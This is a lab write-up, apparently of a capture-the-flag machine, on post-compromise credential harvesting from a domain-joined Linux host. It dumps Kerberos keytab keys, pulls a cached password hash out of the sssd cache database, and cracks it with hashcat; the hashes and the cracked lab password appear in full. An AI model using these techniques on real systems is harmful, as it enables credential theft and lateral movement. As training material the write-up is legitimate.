InfoSec LAB

Cerberus_Post_Compromise_Container

Created: 7 min read

Post Compromise

Now that the container host, icinga.cerberus.local, has been fully compromised, [[Cerberus_Pivoting#|pivoting]] to the DC host is necessary to further explore the target domain. Prior to pivoting, it is critical to make an assessment regarding the level of domain-wide privileges and available credentials, given the current host is indeed a domain-joined Linux machine. Understanding the extent of compromised credentials and evaluating the potential for lateral movement within the domain is essential for informed and strategic exploration of the target environment.

keytab

root@icinga:/dev/shm# file /etc/krb5.keytab
/etc/krb5.keytab: Kerberos Keytab file, realm=CERBERUS.LOCAL, principal=ICINGA$/, type=91135, date=Sat Sep 20 07:30:08 2003, kvno=23

The /etc/krb5.keytab file is a crucial file on a Unix/Linux system that stores encrypted keys for Kerberos principals. It is used for secure authentication without requiring users to enter passwords interactively. Services and applications leverage this file to authenticate to the Kerberos Key Distribution Center (KDC) automatically. The file’s security is maintained by restricting access to privileged users, and it plays a key role in facilitating secure authentication within a Kerberos realm.

root@icinga:/dev/shm# klist -t -K -e -k /etc/krb5.keytab
Keytab name: FILE:/etc/krb5.keytab
KVNO Timestamp         Principal
---- ----------------- --------------------------------------------------------
   2 03/01/23 12:05:00 ICINGA$@CERBERUS.LOCAL (DEPRECATED:arcfour-hmac)  (0xaf70cf6b33f1cce788138d459f676faf)
   2 03/01/23 12:05:00 ICINGA$@CERBERUS.LOCAL (aes128-cts-hmac-sha1-96)  (0x1241a65425ce5c7a0f06be09e8217274)
   2 03/01/23 12:05:00 ICINGA$@CERBERUS.LOCAL (aes256-cts-hmac-sha1-96)  (0x38df579da95520b9489e85a22aec9d3ca4916d5b9a37ff6f0ecda8eec992479f)
   2 03/01/23 12:05:00 host/ICINGA@CERBERUS.LOCAL (DEPRECATED:arcfour-hmac)  (0xaf70cf6b33f1cce788138d459f676faf)
   2 03/01/23 12:05:00 host/ICINGA@CERBERUS.LOCAL (aes128-cts-hmac-sha1-96)  (0x1241a65425ce5c7a0f06be09e8217274)
   2 03/01/23 12:05:00 host/ICINGA@CERBERUS.LOCAL (aes256-cts-hmac-sha1-96)  (0x38df579da95520b9489e85a22aec9d3ca4916d5b9a37ff6f0ecda8eec992479f)
   2 03/01/23 12:05:00 RestrictedKrbHost/ICINGA@CERBERUS.LOCAL (DEPRECATED:arcfour-hmac)  (0xaf70cf6b33f1cce788138d459f676faf)
   2 03/01/23 12:05:00 RestrictedKrbHost/ICINGA@CERBERUS.LOCAL (aes128-cts-hmac-sha1-96)  (0x1241a65425ce5c7a0f06be09e8217274)
   2 03/01/23 12:05:00 RestrictedKrbHost/ICINGA@CERBERUS.LOCAL (aes256-cts-hmac-sha1-96)  (0x38df579da95520b9489e85a22aec9d3ca4916d5b9a37ff6f0ecda8eec992479f)

As it stores encrypted keys for Kerberos principals(SPNs), it contains credentials and entries can be reviewed with the klist command They are likely for the machine account of the icinga.cerberus.local host as they are all identical

While the machine account may be further leveraged for profit, I will move on for now

sssd

sssd (System Security Services Daemon) is a software suite designed for domain-joined Linux hosts. It facilitates seamless integration with remote directory services such as LDAP or Active Directory, enabling centralized authentication and user/group information management. SSSD supports offline authentication, caching to improve performance, and integrates with Pluggable Authentication Modules (PAM) and Name Service Switch (NSS) for a unified user experience. It plays a crucial role in providing secure, efficient, and centralized identity management for Linux systems within a domain environment.

config

root@icinga:~# /ls /etc/sssd/
conf.d  sssd.conf
root@icinga:~# cat /etc/sssd/sssd.conf
 
[sssd]
domains = cerberus.local
config_file_version = 2
services = nss, pam
 
[domain/cerberus.local]
default_shell = /bin/bash
ad_server = cerberus.local
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = CERBERUS.LOCAL
realmd_tags = manages-system joined-with-adcli 
id_provider = ad
fallback_homedir = /home/%u@%d
ad_domain = cerberus.local
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = ad

As the root user, I can check the configuration file for sssd

lib

root@icinga:~# ll /var/lib/sss
total 40
drwxr-xr-x 10 root root 4096 Jan 22  2023 ./
drwxr-xr-x 38 root root 4096 Jan 29  2023 ../
drwx------  2 root root 4096 Mar  2  2023 db/
drwxr-x--x  2 root root 4096 Oct  4  2022 deskprofile/
drwxr-xr-x  2 root root 4096 Oct  4  2022 gpo_cache/
drwx------  2 root root 4096 Oct  4  2022 keytabs/
drwxrwxr-x  2 root root 4096 jan 17 07:01 mc/
drwxr-xr-x  3 root root 4096 jan 17 07:01 pipes/
drwxr-xr-x  3 root root 4096 jan 17 15:08 pubconf/
drwx------  2 root root 4096 Jan 22  2023 secrets/

The /var/lib/sss directory serves as a storage location for various SSSD-related data and caches. This directory and its content are mostly restricted without root-level access from an attacker’s perspective, the most interesting subdirectories in /var/lib/sss are likely to be:

  1. db/: This directory contains the SQLite database files used by SSSD for caching. It may store cached user and group information retrieved from remote authentication sources. An attacker might explore this directory to extract sensitive identity data.
  2. keytabs/: The keytabs directory may contain keytab files, which are used for secure authentication. Attackers may be interested in obtaining these keytab files to potentially impersonate or authenticate as users or services.
  3. secrets/: The secrets directory may contain sensitive information related to secrets and authentication. Exploring this directory could provide attackers with additional details about how SSSD handles secret information; (requires both secrets.ldb and .secrets.mkey)
root@icinga:~# ll /var/lib/sss/*
/var/lib/sss/db:
total 5036
drwx------  2 root root    4096 Mar  2  2023 ./
drwxr-xr-x 10 root root    4096 Jan 22  2023 ../
-rw-r--r--  1 root root 1286144 jan 17 07:01 cache_cerberus.local.ldb
-rw-------  1 root root    2715 Mar  2  2023 ccache_CERBERUS.LOCAL
-rw-------  1 root root 1286144 jan 17 15:46 config.ldb
-rw-------  1 root root 1286144 Jan 22  2023 sssd.ldb
-rw-r--r--  1 root root 1286144 Mar  1  2023 timestamps_cerberus.local.ldb
 
/var/lib/sss/deskprofile:
total 8
drwxr-x--x  2 root root 4096 Oct  4  2022 ./
drwxr-xr-x 10 root root 4096 Jan 22  2023 ../
 
/var/lib/sss/gpo_cache:
total 8
drwxr-xr-x  2 root root 4096 Oct  4  2022 ./
drwxr-xr-x 10 root root 4096 Jan 22  2023 ../
 
/var/lib/sss/keytabs:
total 8
drwx------  2 root root 4096 Oct  4  2022 ./
drwxr-xr-x 10 root root 4096 Jan 22  2023 ../
 
/var/lib/sss/mc:
total 27128
drwxrwxr-x  2 root root     4096 jan 17 07:01 ./
drwxr-xr-x 10 root root     4096 Jan 22  2023 ../
-rw-rw-r--  1 root root  6940392 jan 17 07:01 group
-rw-rw-r--  1 root root 11567160 jan 17 07:01 initgroups
-rw-rw-r--  1 root root  9253600 jan 17 07:01 passwd
 
/var/lib/sss/pipes:
total 12
drwxr-xr-x  3 root root 4096 jan 17 07:01 ./
drwxr-xr-x 10 root root 4096 Jan 22  2023 ../
srw-rw-rw-  1 root root    0 jan 17 07:01 autofs=
srw-rw-rw-  1 root root    0 jan 17 07:01 nss=
srw-rw-rw-  1 root root    0 jan 17 07:01 pac=
srw-rw-rw-  1 root root    0 jan 17 07:01 pam=
drwxr-x---  2 root root 4096 jan 17 07:01 private/
srw-rw-rw-  1 root root    0 jan 17 07:01 ssh=
srw-rw----  1 root root    0 jan 17 07:01 sudo=
 
/var/lib/sss/pubconf:
total 16
drwxr-xr-x  3 root root 4096 jan 17 15:08 ./
drwxr-xr-x 10 root root 4096 Jan 22  2023 ../
-rw-r--r--  1 root root   12 jan 17 15:08 kdcinfo.CERBERUS.LOCAL
drwxr-xr-x  2 root root 4096 jan 17 07:01 krb5.include.d/
 
/var/lib/sss/secrets:
total 1612
drwx------  2 root root    4096 Jan 22  2023 ./
drwxr-xr-x 10 root root    4096 Jan 22  2023 ../
-rw-------  1 root root 1638400 Mar  1  2023 secrets.ldb

Checking all the sub-directories, the /var/lib/sss/db directory stands out most valuable as it contains a few DBs

database

root@icinga:/var/lib/sss/db# file *
cache_cerberus.local.ldb:      TDB database version 6, little-endian hash size 10000 bytes
ccache_CERBERUS.LOCAL:         data
config.ldb:                    TDB database version 6, little-endian hash size 10000 bytes
sssd.ldb:                      TDB database version 6, little-endian hash size 10000 bytes
timestamps_cerberus.local.ldb: TDB database version 6, little-endian hash size 10000 bytes

Those .ldb files are TDB database files mostly in binary format, and ccache_CERBERUS.LOCAL appears to be a TGT Particularly, cache_cerberus.local.ldb, appears to be a cached data I can check for any information leak

root@icinga:/var/lib/sss/db# strings cache_cerberus.local.ldb
 
[...REDACTED...]
 
name=matthew@cerberus.local,cn=users,cn=cerberus.local,cn=sysdb
&DN=NAME=matthew@cerberus.local,CN=USERS,CN=CERBERUS.LOCAL,CN=SYSDB
name=matthew@cerberus.local,cn=users,cn=cerberus.local,cn=sysdb
createTimestamp
1677672476
gidNumber
1000
name
matthew@cerberus.local
objectCategory
user
uidNumber
1000
isPosix
TRUE
lastUpdate
1677672476
dataExpireTimestamp
initgrExpireTimestamp
cachedPassword
$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0
cachedPasswordType
lastCachedPasswordChange
1677672476
failedLoginAttempts
aExpireTimestamp
initgrExpireTimestamp
uidNumber
1000
 
[...REDACTED...]

The cache_cerberus.local.ldb file contains what appears to be a cached credential of the matthew user with a UNIX password hash in SHA512 format; $6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0

This is different from one in the /etc/shadow file, which turned out to be not crack-able

Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ hashcat -a 0 -m 1800 matthew.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
 
watchdog: Temperature abort trigger set to 90c
 
host memory required for this attack: 0 MB
 
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344386
* bytes.....: 139921519
* keyspace..: 14344386
 
$6$6lp9gyixjcovapcy$0qmzttjp9f2a0e7n4xk0l6zoekhhacnm0vgjnx/mu608qklimpiy1fwkzlyujazu3fz3.gq.4n6bb9pxe3t3t0:147258369
 
session..........: hashcat
status...........: Cracked
hash.mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
hash.target......: $6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCN...E3t3T0
time.started.....: Wed Jan 17 17:22:24 2024 (0 secs)
time.estimated...: Wed Jan 17 17:22:24 2024 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........:     2487 H/s (9.36ms) @ Accel:128 Loops:1024 Thr:1 Vec:4
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 512/14344386 (0.00%)
rejected.........: 0/512 (0.00%)
restore.point....: 384/14344386 (0.00%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:4096-5000
candidate.engine.: Device Generator
candidates.#1....: michael1 -> brandy
hardware.mon.#1..: Util: 26%
 
started: Wed Jan 17 17:22:23 2024
stopped: Wed Jan 17 17:22:26 2024

hashcat cracked the password hash of the matthew user The cracked password is 147258369

Interactive Graph View

Backlinks